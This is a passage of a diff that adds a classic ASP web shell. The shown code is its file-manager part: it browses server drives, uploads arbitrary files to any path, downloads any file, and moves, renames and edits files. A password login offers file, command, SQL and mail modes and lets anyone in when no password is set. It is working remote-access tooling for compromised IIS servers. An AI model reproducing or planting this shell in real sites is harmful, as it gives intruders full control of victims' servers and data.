+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Move()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+mv_dst=Trim(Request.Form("mv"))
+if mv_dst="" then exit sub
+mv_dst=abspath(mv_dst)
+Session("mv_dst")=mv_dst
+
+if FSO.FolderExists(mv_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>M</b>oving folder(s) to """ & mv_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFolder itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+set item=nothing
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>M</b>oving file(s) to """ & mv_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFile itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+end sub
+
+'###########################################################################################
+
+sub RenameItem()
+dim item,itemType,itemName,itemPath
+dim param,newName
+
+itemType=request.form("command")
+param=split(request.form("param"),"|")
+itemName=param(0)
+newName=param(1)
+itemPath=addslash(targetPath) & newName
+
+on error resume next
+
+select case itemType
+case "RenameFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFolder(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the folder """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the folder """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the folder """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+case "RenameFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFile(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the file """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the file """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the file """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+end select
+
+set item=nothing
+end sub
+
+'###########################################################################################
+
+sub List()
+dim objFolder,folder,item,intCount,bOpen,ext,count
+if not FSO.FolderExists(targetPath) then
+gMsg="Folder not found"
+else
+on error resume next
+set objFolder=FSO.GetFolder(targetPath)
+if Err.Number<>0 then
+gMsg="Can't open folder"
+else
+intCount=objFolder.SubFolders.Count+objFolder.Files.Count
+if Err.Number<>0 then
+gMsg="Permission denied"
+else
+%>
+<input type=button value=Refresh onclick="Command('Refresh')">
+<input type=button value="New File" onclick="Command('NewFile')">
+<input type=button value="New Folder" onclick="Command('NewFolder')">
+<input type=button value=Upload onclick="frmUpload.max.focus()">
+<input type=button value=Tree onclick="Command('Tree')">
+<%
+bOpen=true
+end if
+end if
+end if
+HtmlQuick()
+if gMsg<>"" then Response.Write "<p>" & gMsg & vbNewLine
+if bOpen then
+count=0
+if intCount>0 then Response.Write "<p>" & objFolder.SubFolders.Count & " subfolder(s)<br>" & vbNewLine & objFolder.Files.Count & " file(s)<br>" & vbNewLine
+if bSize then Response.Write "(" & FormatSize(objFolder.Size) & ")<br>" & vbNewLine
+%>
+<p>
+<table border=1 width=100%>
+<tr>
+<td><b>N</b>ame</td>
+<td align=center><b>S</b>ize</td>
+<td align=center><b>T</b>ype</td>
+<td align=center><b>M</b>odified</td>
+<td><b>A</b>ttributes</td>
+<td><b>A</b>ctions</td>
+<tr>
+<%
+if not isroot(targetPath) then
+%>
+<tr>
+<td><a href="javascript:Command('LevelRoot')" title="Up Root Level">\</a></td>
+<td> </td>
+<td align=center>Root</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<tr>
+<td><a href="javascript:Command('LevelUp')" title="Up One level">..</a></td>
+<td> </td>
+<td align=center>Up</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<%
+end if
+if intCount>0 then
+HtmlJsForm()
+%>
+<form name=theForm method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+<%
+for each item in objFolder.SubFolders
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('OpenFolder',"" & item.Name & "")""" 
+if Len(item.Name)>gMax then Response.Write " title=""" & item.Name & """"
+Response.Write ">" & FormatName(item.Name) & "</a></td>" & vbNewLine
+Response.Write " <td align=right> </td>" & vbNewLine
+Response.Write " <td align=center>DIR</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=d value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFolder',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFolder',"" & item.Name & "")""></td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+for each item in objFolder.Files
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('Download',"" & item.Name & "")"""
+ext=FSO.GetExtensionName(addslash(targetPath) & item.Name)
+re.IgnoreCase = true
+re.Pattern = "^" & ext & ",|," & ext & ",|," & ext & "$"
+if re.Test(lnkExt) then
+Response.Write " title=""-> " & Server.Htmlencode(FindLink(addslash(targetPath) & item.Name)) & """"
+elseif Len(item.Name)>gMax then
+Response.Write " title=""" & item.Name & """"
+end if
+
+Response.Write ">" & FormatName(item.Name) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatSize(item.Size) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & item.Type & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=f value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFile',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFile',"" & item.Name & "")"">"
+
+if re.Test(editExt) then
+Response.Write "<input type=button value=Edit onclick=""Command('Edit',"" & item.Name & "")"">"
+end if
+
+if Lcase(ext)="zip" then
+Response.Write "<input type=button value=Info onclick=""Command('ZipInfo',"" & item.Name & "")"">"
+end if
+
+Response.Write "</td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+if count>0 then
+%>
+<tr>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td><input type=checkbox name=allbox title="Select All" onclick="CheckAll()"><input type=button value=Delete title="Delete Selected Item(s)" onclick="DoWork('Delete')"></td>
+</tr>
+<%
+end if
+%>
+</table>
+<%
+if count>1 then
+%>
+<p>
+<table>
+<tr><td><b>C</b>opy selected item(s) to</td><td><input type=text name=cp value="<%=Session("cp_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.cp_bt.click();"> <input type=button id=cp_bt value=Copy onclick="DoWork('Copy')"></td></tr>
+<tr><td><b>M</b>ove selected item(s) to</td><td><input type=text name=mv value="<%=Session("mv_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.mv_bt.click();"> <input type="button" id=mv_bt value=Move onclick="DoWork('Move')"></td></tr>
+</table>
+<%
+end if
+%>
+</form>
+</table>
+<%
+end if
+set objFolder=nothing
+%>
+<p><b>U</b>pload file(s) to "<%=targetPath%>"
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=gURL%>">
+<input type=hidden name=folder value="<%=targetPath%>">
+Max: <input type=text name=max value=5 size=5> <input type=button value=# onclick="setid()"><br>
+<table>
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload>
+</form>
+<script>
+setid();
+function setid() {
+str='<br>';
+if (frmUpload.max.value<=0) frmUpload.max.value=1;
+for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end if
+%>
+<form name=frmFile method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=param value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+</form>
+<script>frmAddress.param.focus()</script>
+<%
+HtmlJsCommand()
+end sub
+
+'###########################################################################################
+
+sub Upload()
+dim objUpload,f,max,i,name,path,size,success
+
+HtmlHeader("")
+HtmlMode()
+
+set objUpload=New clsUpload
+
+targetPath=objUpload.Fields("folder").Value
+max=objUpload.Fields("max").Value
+
+gMsg= "<b>U</b>pload..." & vbNewLine
+
+for i=1 to max
+name=objUpload.Fields("file" & i).FileName
+size=objUpload.Fields("file" & i).Length
+if (name<>"") and (size>0) then
+gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+path=addslash(targetPath) & name
+objUpload.Fields("file" & i).SaveAs path
+if FSO.FileExists(path) then
+on error resume next
+set f=FSO.GetFile(path)
+if IsObject(f) then
+if f.Size=size then success=true else success=false
+end if
+set f=nothing
+end if
+if success then gMsg=gMsg & "success" else gMsg = gMsg & "fail"
+end if
+next
+
+set objUpload=nothing
+
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Download()
+dim oStream
+dim szFileName
+szFileName=addslash(Request.Form("folder")) & Request.form("Param")
+if FSO.FileExists(szFileName) then
+set oStream=Server.CreateObject("ADODB.Stream")
+oStream.Type=1
+oStream.Open
+on error resume next
+oStream.LoadFromFile(szFileName)
+if Err.Number=0 then
+Response.AddHeader "Content-Disposition", "attachment; filename=" & FSO.GetFileName(szFileName)
+Response.AddHeader "Content-Length", oStream.Size
+Response.ContentType="bad/type" 'yeu cau ie hien hop thoai save-as
+Response.BinaryWrite oStream.Read
+end if
+oStream.Close
+set oStream=nothing
+end if
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Logout()
+Session.Abandon
+Response.Redirect gURL
+Destroy()
+end sub
+
+sub Init()
+Session("switch")=false
+set FSO=Server.CreateObject("Scripting.FileSystemObject")
+set re=new regexp
+end sub
+
+sub Destroy()
+set FSO=nothing
+set re=nothing
+Response.End
+end sub
+
+'###########################################################################################
+
+sub Secure()
+if (Session("allow")=1) then exit sub
+if (gPassword="") then
+Session("allow")=1
+Session("mode")=0
+exit sub
+end if
+if (Request.Form("command")="Login") then
+if Request.Form("password")=gPassword then
+Session("allow")=1
+Session("mode")=CInt(Request.Form("mode"))
+exit sub
+end if
+end if
+
+HtmlHeader("")
+%>
+<form name=frmLogin method=post action="<%=gURL%>">
+<table>
+<tr>
+<td><b>M</b>ode:</td>
+<td>
+<select name=mode>
+<option value=0 selected>FILE
+<option value=1>CMD
+<option value=2>SQL
+<option value=3>MAIL
+</select>
+</td>
+</tr>
+<tr>
+<td><b>P</b>assword:</td>
+<td><input type=password name=password></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=command value=Login></td>
+</tr>
+</table>
+</form>
+<script>frmLogin.password.focus()</script>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub HtmlJsForm()
+%>
+<script>
+function CheckAll() {
+var fmobj=document.theForm;
+for (var i=0; i<fmobj.elements.length;i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (!e.disabled)) {
+e.checked=fmobj.allbox.checked;
+}
+}
+if (fmobj.allbox.checked) {
+fmobj.allbox.title='Clear All';
+} else {
+fmobj.allbox.title='Select All';
+}
+}
+
+function DoWork(cmd) {
+var s;
+var fmobj=document.theForm;
+var total=0;
+for (var i=0; i<fmobj.elements.length; i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (e.checked)) total++;
+}
+
+if (total<1) return;
+
+s=(total>1)?'s':'';
+
+switch (cmd) {
+case "Delete":
+if (!confirm('Are you sure to delete ' + total + ' selected item' + s + ' ?')) return;
+break;
+case "Move":
+var mv=fmobj.mv.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (mv=='') return;
+if ( re1.test(mv) || re2.test(mv) ){
+if (!confirm('Are you sure to move ' + total + ' selected item' + s + ' to "' + mv + '" ?')) return;
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "Copy":
+var cp=fmobj.cp.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (cp=='') return;
+if ( re1.test(cp) || re2.test(cp) ) {
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+default:
+return;
+}
+
+fmobj.command.value=cmd;
+fmobj.submit();
+}
+</script>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlJsCommand()
+%>
+<script>
+function openWin(winName, urlLoc, w, h, showStatus, isViewer) {
+l = (screen.availWidth - w)/2;
+t = (screen.availHeight - h)/2;
+features = "toolbar=no"; // yes|no 
+features += ",location=no"; // yes|no 
+features += ",directories=no"; // yes|no 
+features += ",status=" + (showStatus?"yes":"no"); // yes|no 
+features += ",menubar=no"; // yes|no 
+features += ",scrollbars=" + (isViewer?"yes":"no"); // auto|yes|no 
+features += ",resizable=" + (isViewer?"yes":"no"); // yes|no 
+features += ",dependent"; // close the parent, close the popup, omit if you want otherwise 
+features += ",height=" + h;
+features += ",width=" + w;
+features += ",left=" + l;
+features += ",top=" + t;
+winName = winName.replace(/[^a-z]/gi,"_");
+return window.open(urlLoc,winName,features);
+} 
+
+function createPage (theWin, cmd, param){
+frmFile.target = theWin.name;
+frmFile.command.value = cmd;
+frmFile.param.value = param;
+frmFile.submit();
+}
+
+function CheckName(str) {
+var re;
+re = /[\\/:*?"<>|]/gi;
+if (re.test(str)) return false; 
+else return true;
+} 
+
+function Command(cmd, param) {
+var str;
+var someWin;
+switch (cmd) {
+case "Tree":
+str = prompt("Please enter a name for the folder to tree", frmFile.folder.value);
+if (!str) return;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (re1.test(str) || re2.test(str)) {
+var winName=cmd + document.forms.frmFile.param.value;
+param=str;
+document.forms.frmFile.param.value=param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+}
+else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "NewFile":
+str = prompt("Please enter a name for the new file", "New File");
+if(!str) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "NewFolder":
+str = prompt("Please enter a name for the new folder", "New Folder");
+if(!str) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "RenameFile":
+str = prompt("Please enter the new name for the file", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "RenameFolder":
+str = prompt("Please enter the new name for the folder", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "Edit":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 600, 440, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ChangeAttributesFile":
+case "ChangeAttributesFolder":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 300, 160, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ZipInfo":
+var winName=cmd + document.forms.frmFile.folder.value + param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break
+default:
+frmFile.param.value = param;
+}
+frmFile.target = "";
+frmFile.command.value = cmd
+frmFile.submit(); 
+}
+</script>
+<%
+end sub
+
+sub HtmlJsEditor()
+%>
+<script>
+function EditorCommand (cmd) {
+switch (cmd) {
+case "WordWrap":
+if (frmFile.wrap.checked) frmFile.content.wrap="soft";
+else frmFile.content.wrap="off";
+frmFile.content.focus();
+break;
+case "Reload":
+frmFile.reset();
+break;
+case "Save":
+frmFile.subcommand.value = "Save";
+frmFile.submit();
+break;
+case "SaveAs":
+var str, oldname;
+oldname = frmFile.param.value;
+str = prompt("Save the file as :", oldname);
+if (!str || str==oldname) return;
+frmFile.param.value = str;
+frmFile.subcommand.value = "SaveAs";
+frmFile.submit();
+break;
+}
+}
+</script>
+<%
+end sub
+
+sub HtmlQuick()
+%>
+<form name=frmQuick method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<select name=param onchange="frmQuick.submit()">
+<%
+dim dc,d,dName,dType
+set dc=FSO.Drives
+for each d in dc
+dName=d.DriveLetter&":\"
+select case d.DriveType
+case 0 dType="Unknown"
+case 1 if d.driveletter="A" then dType="?" else dType="?"
+dType=dType&" Floppy" 'maybe wrong
+case 2 dType="HDD " & FormatSize(d.TotalSize)
+case 3 dType="Network"
+case 4
+dType="CD-ROM"
+if not d.IsReady then dType=dType & " - not ready"
+case 5
+dType="RAM Disk"
+end select
+Response.Write "<option value=""" & dName & """"
+if d.DriveLetter=Ucase(Left(targetPath,1)) then Response.Write " selected"
+Response.Write ">" & dName& " (" & dType & ")" & vbNewLine
+next
+set dc=nothing
+%>
+</select>
+</form>
+<form name=frmAddress method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<b>A</b>ddress: <input type=text name=param value="<%=targetPath%>" size=90> <input type=submit value=Go>
+</form>
+<%
+end sub
+
+sub HtmlMode()
+%>
+<table>
+<tr>
+<td>
+<form name=frmChangeMode method=post action="<%=gURL%>">
+<input type=hidden name=command value=ChangeMode>
+<select name=mode onchange="frmChangeMode.submit()">
+<option value=0<%if Session("mode")=0 then Response.Write " selected"%>>FILE
+<option value=1<%if Session("mode")=1 then Response.Write " selected"%>>CMD
+<option value=2<%if Session("mode")=2 then Response.Write " selected"%>>SQL
+<option value=3<%if Session("mode")=3 then Response.Write " selected"%>>MAIL
+</select>
+</form>
+</td>
+<%
+if gPassword<>"" then
+%>
+<td>
+<form name=frmLogout method=post action="<%=gURL%>">
+<input type=submit name=command value=Logout>
+</form>
+</td>
+<%
+end if
+%>
+</tr>
+</table>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlHeader(strTitle)
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=strTitle%></title>
+<style>
+select,input{font-family:Verdana;font-size:9pt}
+</style>
+</head>
+<body>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlFooter()
+%>
+</body>
+</html>
+<%
+end sub
+
+'###########################################################################################
+
+function abspath(path)
+if left(path,1)=":" then abspath=Server.MapPath(mid(path,2)) else abspath=FSO.GetAbsolutePathName(path)
+end function
+
+'###########################################################################################
+
+function addslash(path)
+if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+'###########################################################################################
+
+function findroot(path)
+dim f
+
+set f=FSO.GetFolder(path)
+
+if f.IsRootFolder then
+else
+do until f.IsRootFolder
+set f=f.ParentFolder
+loop
+end if
+findroot=f.Path
+set f=nothing
+end function
+
+'###########################################################################################
+
+function isroot(path)
+dim f
+set f=FSO.GetFolder(path)
+isroot=f.IsRootFolder
+set f=nothing
+end function
+
+'###########################################################################################
+
+Function FindLink(szFileName)
+Dim WshShell, oLink
+
+Set WshShell=Server.CreateObject("WScript.Shell")
+Set oLink=WshShell.CreateShortcut(szFileName)
+
+FindLink=oLink.TargetPath
+
+Set oLink=Nothing
+Set WshShell=Nothing
+End Function
+
+'###########################################################################################
+
+Function FormatSize(intSize)
+If (intSize < 1024) Then
+FormatSize = intSize & " B"
+ElseIf (intSize < 1024*1024) Then
+FormatSize = FormatNumber(intSize/1024,2) & " KB"
+ElseIf (intSize < 1024*1024*1024) Then
+FormatSize = FormatNumber(intSize/(1024*1024),2) & " MB"
+Else
+FormatSize = FormatNumber(intSize/(1024*1024*1024),2) & " GB"
+End If
+End Function
+
+'###########################################################################################
+
+Function FormatName(szName)
+FormatName = szName
+If gMax > 5 And Len(szName) > gMax Then FormatName = Left(szName,gMax-2) & "..."
+End Function
+
+'###########################################################################################
+
+function FormatDate(strDate)
+dim int12HourPart,strAMPM
+int12HourPart=DatePart("h",strDate) mod 12
+if int12HourPart=0 then int12HourPart=12
+if DatePart("h",strDate)>=12 then strAMPM="PM" else strAMPM="AM"
+FormatDate=Right("0"&DatePart("d",strDate),2) & "/" & Right("0"&DatePart("m",strDate),2) & "/" & DatePart("yyyy",strDate) & " " & Right("0"&int12HourPart,2) & ":" & Right("0"&DatePart("n",strDate),2) & ":" & Right("0"&DatePart("s",strDate),2) & " " & strAMPM
+end function
+
+'###########################################################################################
+
+Function GetAttributes(intAttr)
+Dim strAttributes
+strAttributes=""
+If (intAttr And 1) > 0 Then strAttributes = "R"
+If (intAttr And 2) > 0 Then strAttributes=strAttributes & "H"
+If (intAttr And 4) > 0 Then strAttributes=strAttributes & "S"
+If (intAttr And 32) > 0 Then strAttributes=strAttributes & "A"
+If (intAttr And 2048) > 0 Then strAttributes=strAttributes & "C"
+if strAttributes="" then strAttributes=" "
+GetAttributes=strAttributes
+End Function
+
+'###########################################################################################
+
+Class clsField
+Public Name
+Private mstrPath
+Public FileDir
+Public FileExt
+Public FileName
+Public ContentType
+Public Value
+Public BinaryData
+Public Length
+Private mstrText
+
+Public Property Get BLOB()
+BLOB = BinaryData
+End Property
+
+Public Function BinaryAsText()
+Dim lbinBytes
+Dim lobjRs
+If Length = 0 Then Exit Function
+If LenB(BinaryData) = 0 Then Exit Function
+
+If Not Len(mstrText) = 0 Then
+BinaryAsText = mstrText
+Exit Function
+End If
+lbinBytes = ASCII2Bytes(BinaryData)
+mstrText = Bytes2Unicode(lbinBytes)
+BinaryAsText = mstrText
+End Function
+
+Public Sub SaveAs(ByRef pstrFileName)
+Const adTypeBinary=1
+Const adSaveCreateOverWrite=2
+Dim lobjStream
+Dim lobjRs
+Dim lbinBytes
+If Length = 0 Then Exit Sub
+If LenB(BinaryData) = 0 Then Exit Sub
+Set lobjStream = Server.CreateObject("ADODB.Stream")
+lobjStream.Type = adTypeBinary
+Call lobjStream.Open()
+lbinBytes = ASCII2Bytes(BinaryData)
+Call lobjStream.Write(lbinBytes)
+On Error Resume Next
+Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+Call lobjStream.Close()
+Set lobjStream = Nothing
+End Sub
+
+Public Property Let FilePath(ByRef pstrPath)
+mstrPath = pstrPath
+If Not InStrRev(pstrPath, ".") = 0 Then
+FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+FileExt = UCase(FileExt)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+End If
+End Property
+
+Public Property Get FilePath()
+FilePath = mstrPath
+End Property
+
+Private Function ASCII2Bytes(ByRef pbinBinaryData)
+Const adLongVarBinary=205
+Dim lobjRs
+Dim llngLength
+Dim lbinBuffer
+llngLength = LenB(pbinBinaryData)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+Call lobjRs.Update()
+lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+Call lobjRs.Close()
+Set lobjRs = Nothing
+ASCII2Bytes = lbinBuffer
+End Function
+
+Private Function Bytes2Unicode(ByRef pbinBytes)
+Dim lobjRs
+Dim llngLength
+Dim lstrBuffer
+llngLength = LenB(pbinBytes)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+Call lobjRs.Update()
+lstrBuffer = lobjRs.Fields("BinaryData").Value
+Call lobjRs.Close()
+Set lobjRs = Nothing
+Bytes2Unicode = lstrBuffer
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsUpload
+Private mbinData
+Private mlngChunkIndex
+Private mlngBytesReceived
+Private mstrDelimiter
+Private CR
+Private LF
+Private CRLF
+Private mobjFieldAry()
+Private mlngCount
+
+Private Sub RequestData
+Dim llngLength
+mlngBytesReceived = Request.TotalBytes
+mbinData = Request.BinaryRead(mlngBytesReceived)
+End Sub
+
+Private Sub ParseDelimiter()
+mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+End Sub
+
+Private Sub ParseData()
+Dim llngStart
+Dim llngLength
+Dim llngEnd
+Dim lbinChunk
+llngStart = 1
+llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+While Not llngStart = 0
+llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+llngLength = llngEnd - llngStart
+lbinChunk = MidB(mbinData, llngStart, llngLength)
+Call ParseChunk(lbinChunk)
+llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+Wend
+End Sub
+
+Private Sub ParseChunk(ByRef pbinChunk)
+Dim lstrName
+Dim lstrFileName
+Dim lstrContentType
+Dim lbinData
+Dim lstrDisposition
+Dim lstrValue
+lstrDisposition = ParseDisposition(pbinChunk)
+lstrName = ParseName(lstrDisposition)
+lstrFileName = ParseFileName(lstrDisposition)
+lstrContentType = ParseContentType(pbinChunk)
+If lstrContentType = "" Then
+lstrValue = CStrU(ParseBinaryData(pbinChunk))
+Else
+lbinData = ParseBinaryData(pbinChunk)
+End If
+Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+End Sub
+
+Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+Dim lobjField
+ReDim Preserve mobjFieldAry(mlngCount)
+Set lobjField = New clsField
+lobjField.Name = pstrName
+lobjField.FilePath = pstrFileName 
+lobjField.ContentType = pstrContentType
+If LenB(pbinData) = 0 Then
+lobjField.BinaryData = ChrB(0)
+lobjField.Value = pstrValue
+lobjField.Length = Len(pstrValue)
+Else
+lobjField.BinaryData = pbinData
+lobjField.Length = LenB(pbinData)
+lobjField.Value = ""
+End If
+Set mobjFieldAry(mlngCount) = lobjField
+mlngCount = mlngCount + 1
+End Sub
+
+Private Function ParseBinaryData(ByRef pbinChunk)
+Dim llngStart
+llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+If llngStart = 0 Then Exit Function
+llngStart = llngStart + 4
+ParseBinaryData = MidB(pbinChunk, llngStart)
+End Function
+
+Private Function ParseContentType(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 15
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+End Function
+
+Private Function ParseDisposition(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 22
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+End Function
+
+Private Function ParseName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 6
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+' ------------------------------------------------------------------------------
+Private Function ParseFileName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
